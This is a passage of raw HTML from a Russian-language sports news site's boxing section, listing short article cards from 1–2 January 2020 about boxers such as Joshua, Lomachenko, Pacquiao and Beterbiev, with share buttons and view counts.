href="https://twitter.com/intent/tweet?text=%D0%90%D1%80%D1%83%D0%BC%3A+%D0%94%D0%B6%D0%BE%D1%88%D1%83%D0%B0+%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B8%D1%82+%D0%BA%D0%B0%D1%80%D1%8C%D0%B5%D1%80%D1%83+%D0%B2+2020+%D0%B3%D0%BE%D0%B4%D1%83&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Farym-djoshya-zavershit-karery-v-2020-gody%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Farym-djoshya-zavershit-karery-v-2020-gody%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" rel="bookmark" title="Арум: Джошуа завершит карьеру в 2020 году">Арум: Джошуа завершит карьеру в 2020 году</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T06:00:01+00:00">02.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" title="Арум: Джошуа завершит карьеру в 2020 году"><i class="icon-simple icon-fire"></i>5</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/02/arym-djoshya-zavershit-karery-v-2020-gody/" rel="bookmark" title="Арум: Джошуа завершит карьеру в 2020 году">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/938770574725f927c2c8f11c6893f168-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Flomachenko-devis-i-meivezer-v-bokse-radi-deneg%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%9B%D0%BE%D0%BC%D0%B0%D1%87%D0%B5%D0%BD%D0%BA%D0%BE%3A+%D0%94%D1%8D%D0%B2%D0%B8%D1%81+%D0%B8+%D0%9C%D0%B5%D0%B9%D0%B2%D0%B5%D0%B7%D0%B5%D1%80+%D0%B2+%D0%B1%D0%BE%D0%BA%D1%81%D0%B5+%D1%80%D0%B0%D0%B4%D0%B8+%D0%B4%D0%B5%D0%BD%D0%B5%D0%B3&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Flomachenko-devis-i-meivezer-v-bokse-radi-deneg%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Flomachenko-devis-i-meivezer-v-bokse-radi-deneg%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" rel="bookmark" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег">Ломаченко: Дэвис и Мейвезер в боксе ради денег</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T03:27:00+00:00">02.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег"><i class="icon-simple icon-fire"></i>4</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/02/lomachenko-devis-i-meivezer-v-bokse-radi-deneg/" rel="bookmark" title="Ломаченко: Дэвис и Мейвезер в боксе ради денег">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" title="Пакьяо стал автором невероятного рекорда" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/e3ddf23be99c406e0df483f0aedf64be-364x225.png" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fpakiao-stal-avtorom-neveroiatnogo-rekorda%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%9F%D0%B0%D0%BA%D1%8C%D1%8F%D0%BE+%D1%81%D1%82%D0%B0%D0%BB+%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D0%BE%D0%BC+%D0%BD%D0%B5%D0%B2%D0%B5%D1%80%D0%BE%D1%8F%D1%82%D0%BD%D0%BE%D0%B3%D0%BE+%D1%80%D0%B5%D0%BA%D0%BE%D1%80%D0%B4%D0%B0&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fpakiao-stal-avtorom-neveroiatnogo-rekorda%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fpakiao-stal-avtorom-neveroiatnogo-rekorda%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" rel="bookmark" title="Пакьяо стал автором невероятного рекорда">Пакьяо стал автором невероятного рекорда</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-02T00:54:01+00:00">02.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" title="Пакьяо стал автором невероятного рекорда"><i class="icon-simple icon-fire"></i>4</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/02/pakiao-stal-avtorom-neveroiatnogo-rekorda/" rel="bookmark" title="Пакьяо стал автором невероятного рекорда">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" title="Два поединка украинцев стали лучшими в 2019 году" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/0164cd4ab0c581efacad2ebfdcff1bd9-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdva-poedinka-ykraincev-stali-lychshimi-v-2019-gody%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%94%D0%B2%D0%B0+%D0%BF%D0%BE%D0%B5%D0%B4%D0%B8%D0%BD%D0%BA%D0%B0+%D1%83%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%86%D0%B5%D0%B2+%D1%81%D1%82%D0%B0%D0%BB%D0%B8+%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%BC%D0%B8+%D0%B2+2019+%D0%B3%D0%BE%D0%B4%D1%83&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdva-poedinka-ykraincev-stali-lychshimi-v-2019-gody%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdva-poedinka-ykraincev-stali-lychshimi-v-2019-gody%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" rel="bookmark" title="Два поединка украинцев стали лучшими в 2019 году">Два поединка украинцев стали лучшими в 2019 году</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T22:21:00+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" title="Два поединка украинцев стали лучшими в 2019 году"><i class="icon-simple icon-fire"></i>10</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/dva-poedinka-ykraincev-stali-lychshimi-v-2019-gody/" rel="bookmark" title="Два поединка украинцев стали лучшими в 2019 году">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/4f5392ba083e844af11299183840dd78-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdjoshya-ia-ne-bous-yaildera-hotia-on-opasen%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%94%D0%B6%D0%BE%D1%88%D1%83%D0%B0%3A+%D0%AF+%D0%BD%D0%B5+%D0%B1%D0%BE%D1%8E%D1%81%D1%8C+%D0%A3%D0%B0%D0%B9%D0%BB%D0%B4%D0%B5%D1%80%D0%B0%2C+%D1%85%D0%BE%D1%82%D1%8F+%D0%BE%D0%BD+%D0%BE%D0%BF%D0%B0%D1%81%D0%B5%D0%BD&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdjoshya-ia-ne-bous-yaildera-hotia-on-opasen%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fdjoshya-ia-ne-bous-yaildera-hotia-on-opasen%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" rel="bookmark" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен">Джошуа: Я не боюсь Уайлдера, хотя он опасен</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T19:48:00+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен"><i class="icon-simple icon-fire"></i>4</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/djoshya-ia-ne-bous-yaildera-hotia-on-opasen/" rel="bookmark" title="Джошуа: Я не боюсь Уайлдера, хотя он опасен">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/01/gassiev-mojet-vernytsia-na-ring-29-fevralia/" title="Гассиев может вернуться на ринг 29 февраля" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/1b93cac73222498148ffb6e85f1bb95d-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgassiev-mojet-vernytsia-na-ring-29-fevralia%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%93%D0%B0%D1%81%D1%81%D0%B8%D0%B5%D0%B2+%D0%BC%D0%BE%D0%B6%D0%B5%D1%82+%D0%B2%D0%B5%D1%80%D0%BD%D1%83%D1%82%D1%8C%D1%81%D1%8F+%D0%BD%D0%B0+%D1%80%D0%B8%D0%BD%D0%B3+29+%D1%84%D0%B5%D0%B2%D1%80%D0%B0%D0%BB%D1%8F&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgassiev-mojet-vernytsia-na-ring-29-fevralia%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fgassiev-mojet-vernytsia-na-ring-29-fevralia%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/gassiev-mojet-vernytsia-na-ring-29-fevralia/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/gassiev-mojet-vernytsia-na-ring-29-fevralia/" rel="bookmark" title="Гассиев может вернуться на ринг 29 февраля">Гассиев может вернуться на ринг 29 февраля</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T17:15:00+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/gassiev-mojet-vernytsia-na-ring-29-fevralia/" title="Гассиев может вернуться на ринг 29 февраля"><i class="icon-simple icon-fire"></i>19</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/gassiev-mojet-vernytsia-na-ring-29-fevralia/" rel="bookmark" title="Гассиев может вернуться на ринг 29 февраля">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/01/beterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae/" title="Бетербиев может отказаться от обязательной защиты в Китае" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/89640ee83f095530bc9e0f1fc0d102ed.jpeg-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fbeterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%91%D0%B5%D1%82%D0%B5%D1%80%D0%B1%D0%B8%D0%B5%D0%B2+%D0%BC%D0%BE%D0%B6%D0%B5%D1%82+%D0%BE%D1%82%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D1%8C%D1%81%D1%8F+%D0%BE%D1%82+%D0%BE%D0%B1%D1%8F%D0%B7%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9+%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D1%8B+%D0%B2+%D0%9A%D0%B8%D1%82%D0%B0%D0%B5&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fbeterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Fbeterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/beterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/beterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae/" rel="bookmark" title="Бетербиев может отказаться от обязательной защиты в Китае">Бетербиев может отказаться от обязательной защиты в Китае</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T14:42:00+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/beterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae/" title="Бетербиев может отказаться от обязательной защиты в Китае"><i class="icon-simple icon-fire"></i>8</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/beterbiev-mojet-otkazatsia-ot-obiazatelnoi-zashity-v-kitae/" rel="bookmark" title="Бетербиев может отказаться от обязательной защиты в Китае">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/box/2020/01/01/lomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii/" title="Ломаченко и Лопес могут подраться в Саудовской Аравии" rel="bookmark"><span class="thumbnail-resize"><img width="364" height="225" src="https://euro.com.ua/wp-content/uploads/2020/01/7265be4678a45f9ad903f9e724ae990c-364x225.jpg" class="attachment-newsmax_ruby_crop_364x225 size-newsmax_ruby_crop_364x225 wp-post-image" alt="" /></span></a></div><div class="post-mask-overlay"></div><div class="post-cat-info is-absolute is-light-text"><a class="cat-info-el cat-info-id-5" href="https://euro.com.ua/box/" title="Бокс">Бокс</a></div><div class="post-meta-info-share is-absolute"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Flomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=%D0%9B%D0%BE%D0%BC%D0%B0%D1%87%D0%B5%D0%BD%D0%BA%D0%BE+%D0%B8+%D0%9B%D0%BE%D0%BF%D0%B5%D1%81+%D0%BC%D0%BE%D0%B3%D1%83%D1%82+%D0%BF%D0%BE%D0%B4%D1%80%D0%B0%D1%82%D1%8C%D1%81%D1%8F+%D0%B2+%D0%A1%D0%B0%D1%83%D0%B4%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%B9+%D0%90%D1%80%D0%B0%D0%B2%D0%B8%D0%B8&amp;url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Flomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii%2F&amp;via=%D0%A1%D0%B2%D0%B5%D0%B6%D0%B8%D0%B5+%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B0"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F01%2Flomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-vk" href="https://vkontakte.ru/share.php?url=https://euro.com.ua/box/2020/01/01/lomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-vk"></i></a></div></div><!--thumb outer--></div><div class="post-body"><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://euro.com.ua/box/2020/01/01/lomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii/" rel="bookmark" title="Ломаченко и Лопес могут подраться в Саудовской Аравии">Ломаченко и Лопес могут подраться в Саудовской Аравии</a></h2><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-date"><i class="icon-simple icon-clock"></i><time class="date published" datetime="2020-01-01T12:08:59+00:00">01.01.2020</time></span><!--meta info date--></div><div class="post-meta-info-right"><span class="meta-info-right-view meta-info-el"><a href="https://euro.com.ua/box/2020/01/01/lomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii/" title="Ломаченко и Лопес могут подраться в Саудовской Аравии"><i class="icon-simple icon-fire"></i>34</a></span></div></div><div class="post-btn"><a class="btn" href="https://euro.com.ua/box/2020/01/01/lomachenko-i-lopes-mogyt-podratsia-v-saydovskoi-aravii/" rel="bookmark" title="Ломаченко и Лопес могут подраться в Саудовской Аравии">Читать больше</a></div></div><!--post body--></article></div><div class="post-outer col-sm-6 col-xs-12"><article class="post-wrap post-grid post-grid-2"><div class="post-header"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a 